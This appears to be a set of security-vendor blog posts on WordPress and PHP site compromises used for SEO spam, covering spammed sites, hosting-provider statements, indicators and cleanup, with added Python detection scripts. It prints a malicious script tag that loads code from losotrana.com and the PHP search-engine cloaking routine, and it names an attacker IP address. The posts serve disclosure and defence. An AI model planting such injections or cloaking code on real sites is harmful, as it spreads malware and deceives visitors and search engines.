SEO SPAM network – Code used and more details

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1. SEO SPAM network – Details of the wp-includes infection
2. It is not over – SEO Spam on sites infected

Some big sites got infected, and the common complaint I hear is that even after they clean up the spam, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and they left a backdoor hanging in there. So you need to find where it is.


SEO SPAM network – Details of the wp-includes infection

We have been digging lately in a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on WordPress web sites.

Sites compromised:

The list is big. Some of the ones that caught my eye were:

Mindtouch.com (Popular open source product)
chapters.asmconline.org (American Society of Military comptrollers)
blog.woodward.edu (university)
content.hks.harvard.edu (university)
cima.ned.org (National Endowment for Democracy)
scripts.mit.edu
web.mit.edu
badminton.mit.edu
people.oregonstate.edu
whi.wts.edu
blogs.hartwick.edu
virtualcms.net

And the list goes on and on and on…

XSS on oswd.org (Open source Web design) used by spammers

http://www.oswd.org/ (Open Source Web Design) is a popular web site used for sharing templates and web designs. They have a strong and active community, and we have actually used it in the past when looking for templates.

However, we lately started to notice a lot of spammers using the oswd.org site for hosting their content. Instead of having links to a viagra or cialis web site, they were linking directly to random oswd profiles. For example:

http://www.oswd.org/user/profile/id/52781 or
http://www.oswd.org/user/profile/id/52780 or
http://www.oswd.org/user/profile/id/52792

*There are hundreds of profiles within the 526-528 range being used for that. If you search on twitter for “user profile” “oswd” you will find a bunch as well.

All the sites at the Walmart Community network hacked

We posted a few weeks ago that the main site for the Walmart community network was hacked. Well, the problem is a lot bigger than that.

They have web sites for different cities and most of them are hacked too. For example:

  • http://arkansas.walmartcommunity.com/ (65.61.140.162) – SEO spam
  • http://florida.walmartcommunity.com (65.61.167.225) – SEO spam (only visible to Google)
  • http://chicago.walmartcommunity.com (65.61.140.161) – SEO spam
  • http://chicago.walmartcommunity.com/wp-includes/8pmax/ – Fake AV (when coming from Google)
  • http://philadelphia.walmartcommunity.com/ (65.61.167.225) – SEO spam

And probably every one of them is, since I only checked the ones linked from their front page. They are all using WordPress 2.8.4, hosted at Rackspace and configured the same way.


Lean.mit.edu hacked and serving spam

Interested in Viagra, Cialis and some other “magical” medications? It seems that the MIT web site for the Lean Advancement Initiative (http://lean.mit.edu/ ) knows a bit about it:


Joking aside, they got hacked and are being used to serve a lot of SPAM. In fact, we were fixing a web site that had a lot of links to it:

original viagra bestellen 
original viagra rezeptfrei
viagra droga generica
..
viagra verpackung
cialis filmtabletten
viagra kaufen test
viagra original preis
günstig viagra

The script is also a bit clever, so if you visit it without any argument, it returns a 404 (try http://lean.mit.edu/blind/products/lesat/lesat.php ).
If you visit with an argument, it shows the spam: (try http://lean.mit.edu/blind/products/lesat/lesat.php?pills=bestellen-viagra )


Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src="http://losotrana.com/js.php"></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far are hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they have not been able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same IP address as holasionweb.com, the domain used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from 178.32.42.1, which also presents a fake Googlebot user agent:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am happy with this response, and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important and hopefully when they find out what happened they will do a full case study so we can all learn from that (or am I dreaming too much?)

It is not over – SEO Spam on sites infected

Did your site get hacked in the last 3 or 4 weeks? If it did, you may still have some things to clean up.

We lately started to notice, in a lot of the sites we have been fixing, a “.files” directory full of spam links. We initially thought it was an isolated incident, but it became more frequent, so we decided to put our scanner to work to see how many we could find.

So far, we have a list of more than a thousand sites with that (to be exact, 1,125 sites so far). These are just sites we have scanned in the last few hours, so the number is probably way bigger. Also, our list has sites from all major hosting companies and all web applications, so it is nothing specific to one company/tool.

How to find out if you are still infected? Via FTP, just list the .files directory on your web root:

.files$ ls
1 in 5 divorces refers to facebook.html
2000 year old man.html
2009 kennedy center honorees.html
2009 pro bowl.html
..
2009 pro bowl roster.html
2009 pro bowl selections.html
2010 nfl pro bowl selections.html

You will see hundreds of files in there. Via a browser, just visit http://yoursite.com/.files/

If you see a directory listing full of links you don’t know about, it means that you are still infected.

For people using our scanner, it has been alerting on this for a little while, so you were (or will be) notified soon.

Now you may ask: why were these files added in there? They are being used as an SEO spam tactic to increase the page rank of the attackers' sites.

They are used in conjunction with this code (our signature MW:SPAM:S2), which reads the content of the file only if the request comes from a search engine:

function get_page($key){
    // builds the spam page path from the request key and returns its content if the file exists
    $f_n=".files/".$key.".html";
    if (@file_exists($f_n)) return @file_get_contents($f_n);
}

Code to check if it comes from a search engine:

$ip=sprintf("%u",ip2long($_SERVER["REMOTE_ADDR"]));
if (($ip>=3639549952)&&($ip<=3639558143))$searchengine=1; //GOOGLE (216.239.32.0-216.239.63.255)
if (($ip>=1123631104)&&($ip<=1123639295))$searchengine=1; //GOOGLE (66.249.64.0-66.249.95.255)
if (($ip>=1089052672)&&($ip<=1089060863))$searchengine=1; //GOOGLE (64.233.160.0-64.233.191.255)
if (($ip>=1078218752)&&($ip<=1078220799))$searchengine=1; //GOOGLE (64.68.80.0-64.68.87.255)
if (($ip>=1078220802)&&($ip<=1078222031))$searchengine=1; //GOOGLE (64.68.88.2-64.68.92.207)
if (($ip>=1087381508)&&($ip<=1087382952))$searchengine=1; //GOOGLE (64.208.32.4-64.208.37.168)
if (($ip>=3512041472)&&($ip<=3512045567))$searchengine=1; //GOOGLE (209.85.128.0-209.85.143.255)
if (($ip>=1113980928)&&($ip<=1113985023))$searchengine=1; //GOOGLE (66.102.0.0-66.102.15.255)
if (($ip>=1208926208)&&($ip<=1208942591))$searchengine=1; //GOOGLE (72.14.192.0-72.14.255.255)
if (($ip>=1249705984)&&($ip<=1249771519))$searchengine=1; //GOOGLE (74.125.0.0-74.125.255.255)
if (stristr($_SERVER["HTTP_USER_AGENT"],"msnbot")||stristr($_SERVER["HTTP_USER_AGENT"],"Yahoo"))$searchengine=1;
if (stristr($_SERVER["HTTP_USER_AGENT"],"via translate.google.com"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google WAP Proxy"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google CHTML Proxy"))$searchengine=0;

Now, if a normal user visits it, they are just redirected to cnn.com and won’t really notice anything wrong.
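To see what the checks above mean for an incident responder, here is the same decision re-implemented in Python and run over a handful of constructed access-log lines. This is an added example, not code from the original post or from the malware; the IP ranges are copied from the comments in the malware's own checks, and the log lines (including one that mirrors the spoofed-Googlebot user agent from the losotrana.com post above) are made up for the demonstration.

```python
import ipaddress
import re

# Google address ranges, copied from the comments in the malware's own checks
# (dotted start/end pairs; the malware compares the unsigned ip2long value).
GOOGLE_RANGES = [
    ("216.239.32.0", "216.239.63.255"),
    ("66.249.64.0", "66.249.95.255"),
    ("64.233.160.0", "64.233.191.255"),
    ("64.68.80.0", "64.68.87.255"),
    ("64.68.88.2", "64.68.92.207"),
    ("64.208.32.4", "64.208.37.168"),
    ("209.85.128.0", "209.85.143.255"),
    ("66.102.0.0", "66.102.15.255"),
    ("72.14.192.0", "72.14.255.255"),
    ("74.125.0.0", "74.125.255.255"),
]
# User-agent substrings the malware treats as a search engine (case-insensitive, like stristr)...
UA_ENGINE = ("msnbot", "yahoo")
# ...and the proxy strings that switch the flag back off afterwards.
UA_PROXY = ("via translate.google.com", "google wap proxy", "google chtml proxy")


def _to_int(dotted):
    return int(ipaddress.IPv4Address(dotted))


def looks_like_search_engine(remote_addr, user_agent):
    """True when the malware's checks would flag this request as a search engine
    and serve the .files/ spam page instead of the cnn.com redirect."""
    try:
        ip = _to_int(remote_addr)
    except ipaddress.AddressValueError:
        return False
    engine = any(_to_int(lo) <= ip <= _to_int(hi) for lo, hi in GOOGLE_RANGES)
    ua = user_agent.lower()
    if any(s in ua for s in UA_ENGINE):
        engine = True
    if any(s in ua for s in UA_PROXY):  # these lines come last in the PHP, so they win
        engine = False
    return engine


# Combined log format: client IP, ident, user, [time], "request", status, bytes, "referer", "user-agent".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')


def classify_log(lines):
    """Map each parsable log line to (client IP, True if the malware would have served spam)."""
    result = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            result.append((m.group(1), looks_like_search_engine(m.group(1), m.group(2))))
    return result


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '66.249.66.1 - - [10/May/2010:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '10.0.0.5 - - [10/May/2010:10:00:01 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Firefox/3.6"',
    '10.0.0.6 - - [10/May/2010:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"',
    '66.249.66.2 - - [10/May/2010:10:00:03 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1) via translate.google.com"',
    '178.32.42.1 - - [10/May/2010:10:00:04 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
]

if __name__ == "__main__":
    for ip, served_spam in classify_log(SAMPLE_LOG):
        print(f"{ip:15} served spam: {served_spam}")
```

Two things the run makes visible: a Googlebot user agent from an address outside the listed Google ranges (the last line) is not treated as a search engine, so a site owner who only spoofs the user agent from their own machine will see the cnn.com redirect and conclude the site is clean; and a request from a Google address that arrives through translate.google.com is deliberately excluded, so the cloaked page is only shown to the crawler itself. Checking Google's cached copy of the page, or the server's own files, is therefore more reliable than fetching the page with a faked user agent.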

Clean up:

If you have this .files directory, go ahead and remove it. Also, search your main directory for a PHP file (random name) with a big base64 string. Go ahead and remove it as well.
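The cleanup steps above (the .files directory, a randomly named PHP file with a big base64 string) and the injected losotrana.com script tag from the GoDaddy post can be checked for in one pass over a local copy of the web root. The scanner below is an added example and not a Sucuri tool; the 200-character threshold for a "big" base64 string is my own choice, and the sample web root it builds is constructed on the fly so the script runs offline.

```python
import base64
import os
import re
import shutil
import tempfile

# Indicators taken from the posts: a .files directory of spam pages, a PHP file
# holding one long base64 string, and the injected losotrana.com script tag.
# The 200-character threshold is an assumption, not something the posts state.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
INJECTED_SCRIPT = re.compile(r"<script\s+src=[\"']?https?://losotrana\.com/js\.php", re.I)
TEXT_EXT = (".php", ".html", ".htm", ".js")


def scan_webroot(root):
    """Return sorted (indicator, path, detail) tuples for everything found under root."""
    findings = []
    files_dir = os.path.join(root, ".files")
    if os.path.isdir(files_dir):
        findings.append(("spam-dir", files_dir, f"{len(os.listdir(files_dir))} files"))
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(TEXT_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    data = fh.read()
            except OSError:
                continue
            if INJECTED_SCRIPT.search(data):
                findings.append(("injected-script", path, "losotrana.com/js.php"))
            if name.lower().endswith(".php"):
                m = LONG_B64.search(data)
                if m:
                    findings.append(("long-base64", path, f"{len(m.group(0))} chars"))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree (not a real compromised site) so the scanner can run offline."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.mkdir(os.path.join(root, ".files"))
    for i in range(3):
        with open(os.path.join(root, ".files", f"spam page {i}.html"), "w") as fh:
            fh.write("<a href='http://spam.example/'>constructed spam link</a>\n")
    # A harmless blob stands in for the backdoor's payload; only its shape matters here.
    blob = base64.b64encode(b"constructed sample payload, not real malware " * 20).decode()
    with open(os.path.join(root, "x7f2k.php"), "w") as fh:
        fh.write("<?php $data = '" + blob + "'; ?>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php /* clean front page */ ?>\n<html><body>ok</body>\n'
                 '<script src="http://losotrana.com/js.php"></script></html>\n')
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for indicator, path, detail in scan_webroot(sample):
            print(f"{indicator:16} {os.path.relpath(path, sample):24} {detail}")
    finally:
        shutil.rmtree(sample)
```

Point it at a downloaded copy of the site (`scan_webroot("/path/to/site")`) rather than the live server when possible. The base64 heuristic will also flag legitimate files that embed data URIs or vendored libraries, so review each hit and compare it against a clean copy of the application before deleting anything.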

*If anyone wants the list of sites (for research purposes only), let me know.

**btw, that has nothing to do with GoDaddy. On my list we have sites from all major hosting companies.


Last week attacks – Some comments and updates

Last week was a busy one.

First, thousands of GoDaddy sites got hacked with that kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites got hacked by using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, thousands more sites at different providers (GoDaddy, Dreamhost, hostgator, etc) got hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform that allowed the exploit to happen. They fixed it already, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were using old WordPress versions) and didn’t provide us with information regarding what happened. We know that WordPress wasn’t the problem (we saw sites using the latest version getting hacked), so no one knows what happened. Probably thousands of sites got hacked.

DreamHost

DreamHost contacted us and explained that in their platform the issue was caused by a “specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.”. Around 500 sites got hacked. Their statement:

We’ve seen a dozen or so examples of this passed to us via support and have researched it ourselves. It seems to be related to a specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted. 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP’s inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December.

How are they getting in?

The Network Solutions issue was explained and fixed. At Dreamhost, it was a PHP shell. But how about the others? How were the attackers able to inject content on all these sites?

Skyphire (and others), in our comments, mentioned that the infected files had a phpMyAdmin cookie added, which would indicate a bug (maybe a 0-day) in phpMyAdmin. That would be a possible cause, since all those shared hosts are using phpMyAdmin. This is the cookie added:


getCookie("pma_visited_theme1");

We can’t prove it, but we will keep an eye on it to find out exactly what is going on. Have more info? Let us know.


Serendipity important security update

If you are using Serendipity, stop everything you are doing and read this:

Serendipity 1.5.3 has been released, as a security-fix release with no other relevant changes.

A security issue has been discovered by Stefan Esser during the course of the Month of PHP Security. This issue was found in the WYSIWYG library Xinha (which Serendipity uses), and affects certain plugins to Xinha (Linker, ImageManager, ExtendedFileManager, InsertSnippet) which can use a dynamic configuration loader. This loader allows uploading a file with arbitrary PHP code and thus allows remote code execution, even when not logged in to the Xinha/Serendipity backend.

Due to the seriousness of this bug, we urge everyone to upgrade their installations. People who don’t want the hassle of a full upgrade and are not using the mentioned Xinha-plugins actively, can simply delete the file htmlarea/contrib/php-xinha.php, which will render the mentioned plugins and exploits useless.

Now go and update your blogs as soon as possible. You can either just remove that file or do a full-blown update. Our scanner will now also alert on old versions being used.